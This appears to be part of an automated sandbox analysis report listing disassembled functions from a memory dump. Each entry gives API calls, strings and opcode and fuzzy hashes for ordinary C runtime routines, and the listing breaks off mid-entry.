                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                      • Opcode ID: e738eda3dbc1fab1b558436e85e0f414863e30d97480f66e19cff1ca9febbf30
                                                                                                                                                                      • Instruction ID: 766eaafb330312b1caba85d5aca752094618844a719b7da74d56adb4aad54156
                                                                                                                                                                      • Opcode Fuzzy Hash: e738eda3dbc1fab1b558436e85e0f414863e30d97480f66e19cff1ca9febbf30
                                                                                                                                                                      • Instruction Fuzzy Hash: F8315F36A08B8186D760CF26E8407AE77A0FBD9758F500135EBAD87B99EF38D155CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE122B4C, Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1443284424-0
                                                                                                                                                                      • Opcode ID: a3ee30757392479f5a7cce126f2a8e91cadbc6b924d7436d729ce31afda1fd9e
                                                                                                                                                                      • Instruction ID: 6b2ad15e38693717c1d6f172c68bb4a4d05f488fd82f66dfd9fcdfd134700495
                                                                                                                                                                      • Opcode Fuzzy Hash: a3ee30757392479f5a7cce126f2a8e91cadbc6b924d7436d729ce31afda1fd9e
                                                                                                                                                                      • Instruction Fuzzy Hash: BFE1F262F086819AE700CB66D8401ED7BB1FBA6788F504135EF6E97BD9EE38D516C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE103C20, Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 497COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID: %
                                                                                                                                                                      • API String ID: 3668304517-2567322570
                                                                                                                                                                      • Opcode ID: 8a66d5076b83e9d492563f899b77351946d8774d763da9b8404ba780dddf6097
                                                                                                                                                                      • Instruction ID: 8fedf5a2a1bc67f76d39220c051f3914a0acc5ceb26ee22442bc616c5c523719
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a66d5076b83e9d492563f899b77351946d8774d763da9b8404ba780dddf6097
                                                                                                                                                                      • Instruction Fuzzy Hash: 7C123222F08A8589FB25CB66E4503FD6B61ABA4788F045131EF6D97BC9EF3CD4648340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11EF2C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocaletry_get_function
                                                                                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                                                                                      • API String ID: 2200034068-2904428671
                                                                                                                                                                      • Opcode ID: eee715fbac3006e22b13ca4ea214737d10d3c8228fae26dd80626aacc3aa4420
                                                                                                                                                                      • Instruction ID: 165f4113c64bd5abcb08f5b8eec2e635033b5cc1c2e0e1465f193262c3c2d46c
                                                                                                                                                                      • Opcode Fuzzy Hash: eee715fbac3006e22b13ca4ea214737d10d3c8228fae26dd80626aacc3aa4420
                                                                                                                                                                      • Instruction Fuzzy Hash: 17016D25F08B8285EB00DB93B8404AAAA64AFF5BD0F584435FE6C97BD5EE3CE5418744
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE11F29C, Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F2B7
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F2D6
                                                                                                                                                                        • Part of subcall function 00007FF6FE11EA28: GetProcAddress.KERNEL32(?,?,00000005,00007FF6FE11EF06,?,?,8000000000000000,00007FF6FE11AC42,?,?,8000000000000000,00007FF6FE116A2D), ref: 00007FF6FE11EB80
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F2F5
                                                                                                                                                                        • Part of subcall function 00007FF6FE11EA28: LoadLibraryW.KERNELBASE(?,?,00000005,00007FF6FE11EF06,?,?,8000000000000000,00007FF6FE11AC42,?,?,8000000000000000,00007FF6FE116A2D), ref: 00007FF6FE11EACB
                                                                                                                                                                        • Part of subcall function 00007FF6FE11EA28: GetLastError.KERNEL32(?,?,00000005,00007FF6FE11EF06,?,?,8000000000000000,00007FF6FE11AC42,?,?,8000000000000000,00007FF6FE116A2D), ref: 00007FF6FE11EAD9
                                                                                                                                                                        • Part of subcall function 00007FF6FE11EA28: LoadLibraryExW.KERNEL32(?,?,00000005,00007FF6FE11EF06,?,?,8000000000000000,00007FF6FE11AC42,?,?,8000000000000000,00007FF6FE116A2D), ref: 00007FF6FE11EB1B
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F314
                                                                                                                                                                        • Part of subcall function 00007FF6FE11EA28: FreeLibrary.KERNEL32(?,?,00000005,00007FF6FE11EF06,?,?,8000000000000000,00007FF6FE11AC42,?,?,8000000000000000,00007FF6FE116A2D), ref: 00007FF6FE11EB54
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F333
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F352
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F371
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F390
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F3AF
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F3CE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                                      • API String ID: 3255926029-3252031757
                                                                                                                                                                      • Opcode ID: 7ae8db01b808dd89840a75df8cabf87d40bbb11ba067a80d5ff1f2e4a99f70d4
                                                                                                                                                                      • Instruction ID: dd6d0c1c972d945994cc0a08de531c001d4777fa5c668343478663b0e91d4384
                                                                                                                                                                      • Opcode Fuzzy Hash: 7ae8db01b808dd89840a75df8cabf87d40bbb11ba067a80d5ff1f2e4a99f70d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 26316B60D18A47A8F704DB96EC526E96B21BBA4341FC04437F43D961E2BF7CA64DC349
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE103720, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 255COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      • API String ID: 459529453-1866435925
                                                                                                                                                                      • Opcode ID: 5f5df7f7e40a59f312fc8a143b46a986f631a95f737e9221bd87bb5ff3ae644f
                                                                                                                                                                      • Instruction ID: 9397e355f3e7feb57b5efef3bdc211434a023596e2cdd9601f290eb4a6a92c3a
                                                                                                                                                                      • Opcode Fuzzy Hash: 5f5df7f7e40a59f312fc8a143b46a986f631a95f737e9221bd87bb5ff3ae644f
                                                                                                                                                                      • Instruction Fuzzy Hash: 53B19E22E09A8185EB24DB16E4403B97BA1FBD5B84F545136EBAD83BE5EF3CD455C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE106A70, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 151COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name$false$true
                                                                                                                                                                      • API String ID: 4121308752-1062449267
                                                                                                                                                                      • Opcode ID: 1883a582b6bff787cff5b330a0cd1b3edb92caeee22c469266d388372aeb76fc
                                                                                                                                                                      • Instruction ID: fbb9438d87b5794cce2664a2a25a1ea1f0f1e435c6ecff4114545a37677b0407
                                                                                                                                                                      • Opcode Fuzzy Hash: 1883a582b6bff787cff5b330a0cd1b3edb92caeee22c469266d388372aeb76fc
                                                                                                                                                                      • Instruction Fuzzy Hash: E3618C22E0A7428AFB14DF62D4502BC3BA5EFA0744F445135EA5DA7AD6EF3CE466C304
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE10D0BC, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 3606184308-393685449
                                                                                                                                                                      • Opcode ID: ad7ed73937a1dd237070555565f728518e44f666302cee83b44181870f8f7486
                                                                                                                                                                      • Instruction ID: 2a335ccea07fefb80e6ec6fa56fe8105826f356942bfc9c769c46d89203476aa
                                                                                                                                                                      • Opcode Fuzzy Hash: ad7ed73937a1dd237070555565f728518e44f666302cee83b44181870f8f7486
                                                                                                                                                                      • Instruction Fuzzy Hash: 1AD15F72E087458AEB20DB6694412AD7BA0FBA5798F002135FF6D97BD5EF38E061C701
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE124680, Relevance: 10.8, APIs: 7, Instructions: 291COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 65c67ee29b172f3aaf2071a4a3b55cc142d5f95449ac71a6ce88a5a1d0bc4fff
                                                                                                                                                                      • Instruction ID: 96246e32b79dcaf0e2db59354b1aff6b29dcbe26ef462c828a985310092ab87b
                                                                                                                                                                      • Opcode Fuzzy Hash: 65c67ee29b172f3aaf2071a4a3b55cc142d5f95449ac71a6ce88a5a1d0bc4fff
                                                                                                                                                                      • Instruction Fuzzy Hash: 49C1F522E1C69285EB20DB56A80027D6FA4FBF2B80F454131FA6E877D5EE7DE465C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE10F8CC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FE10FB7A,?,?,?,00007FF6FE10F7F4,?,?,?,?,00007FF6FE10B8CD), ref: 00007FF6FE10F94F
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF6FE10FB7A,?,?,?,00007FF6FE10F7F4,?,?,?,?,00007FF6FE10B8CD), ref: 00007FF6FE10F95D
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FE10FB7A,?,?,?,00007FF6FE10F7F4,?,?,?,?,00007FF6FE10B8CD), ref: 00007FF6FE10F987
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF6FE10FB7A,?,?,?,00007FF6FE10F7F4,?,?,?,?,00007FF6FE10B8CD), ref: 00007FF6FE10F9CD
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF6FE10FB7A,?,?,?,00007FF6FE10F7F4,?,?,?,?,00007FF6FE10B8CD), ref: 00007FF6FE10F9D9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                      • Opcode ID: b761e5433ce2450e37b89b641fd627801baa61bd38bef159c72b63580617267b
                                                                                                                                                                      • Instruction ID: 4c1ce486b59264d0d7d3d68ce079eb6fa6f950d6b4962fcd5cc7dbe00687c01c
                                                                                                                                                                      • Opcode Fuzzy Hash: b761e5433ce2450e37b89b641fd627801baa61bd38bef159c72b63580617267b
                                                                                                                                                                      • Instruction Fuzzy Hash: 8031A322E1E642A1EF11DB0398016792B96BFA8BA4F591535FE6E873C4FE3CE055C341
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE12A254, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                      • Opcode ID: 17aa42be1855e8293f7d7b9052321d776abf8ab5934ab8638aae0abb00b52cbe
                                                                                                                                                                      • Instruction ID: 025a0dc53500cc8c04c5dbb48db173dd66d9ef431915938895766730b9d7ed92
                                                                                                                                                                      • Opcode Fuzzy Hash: 17aa42be1855e8293f7d7b9052321d776abf8ab5934ab8638aae0abb00b52cbe
                                                                                                                                                                      • Instruction Fuzzy Hash: 24117C31E18A4186E350CB53E8447296AA0BBEABE8F504335FA6DC77D4EF3CD4448745
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE10A6EC, Relevance: 9.2, APIs: 6, Instructions: 203COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2829165498-0
                                                                                                                                                                      • Opcode ID: 0ea3efd0d96233e8bf874a7ad7a2cc7a21ce19e72c17bfd768373a6dad6ab731
                                                                                                                                                                      • Instruction ID: 6a38f7877b65ed590ac1f485347bfb3e50733ea59e5a9bea46b22a139befe129
                                                                                                                                                                      • Opcode Fuzzy Hash: 0ea3efd0d96233e8bf874a7ad7a2cc7a21ce19e72c17bfd768373a6dad6ab731
                                                                                                                                                                      • Instruction Fuzzy Hash: 71816D33B1874286EB20CF52945036A6AA1FBA4BA8F145335FB6E97BD4EF3CD4158740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE106410, Relevance: 9.1, APIs: 6, Instructions: 91COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                      • Opcode ID: f03270646cd50eae441d6e570d09acc80cf4af85bf9899de021a018538877541
                                                                                                                                                                      • Instruction ID: e8448e24a84eb010a31581d237690b93161472b063d821f2eeb1c13e02c4523d
                                                                                                                                                                      • Opcode Fuzzy Hash: f03270646cd50eae441d6e570d09acc80cf4af85bf9899de021a018538877541
                                                                                                                                                                      • Instruction Fuzzy Hash: AF314461E08A4180EB21DB17E4401796BA1FBE5BE4F181532FB6D87BE9EE3CE451C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE108700, Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                      • Opcode ID: e442c3c5f32b225f9bfd1fcd874e039e77c952d174d73c7182559b48d446be9e
                                                                                                                                                                      • Instruction ID: e18f8df497e67148dd5818ce3a383c0678d4d2dfed9d1d66d3283247ed90e421
                                                                                                                                                                      • Opcode Fuzzy Hash: e442c3c5f32b225f9bfd1fcd874e039e77c952d174d73c7182559b48d446be9e
                                                                                                                                                                      • Instruction Fuzzy Hash: C1316F25E0CA8281EB05DB17E4410B96B61FBE5B94F181532FB6D837EAFE3CE4618700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE10D584, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 3523768491-393685449
                                                                                                                                                                      • Opcode ID: 7dfd4bda0c3efe84babe414968b57461c88ce9cb546e615a3c9a8c7545501632
                                                                                                                                                                      • Instruction ID: 8f119e40589933c32b7b202a3c3e429da70ba782988f5364d03a851978e97e83
                                                                                                                                                                      • Opcode Fuzzy Hash: 7dfd4bda0c3efe84babe414968b57461c88ce9cb546e615a3c9a8c7545501632
                                                                                                                                                                      • Instruction Fuzzy Hash: 07E1C272D087868AE720DF26D4403AD3BA0FBA5748F146135FBAD976D5EE38E491CB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6FE1120AC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: 355763e493dad6538389df0793eed467e39f6892aaedefc02179b19105f30a0b
                                                                                                                                                                      • Instruction ID: b7db570e5b5dd0b10748c50d780d92c0c9011de6ac029494a996985595a0f7fc
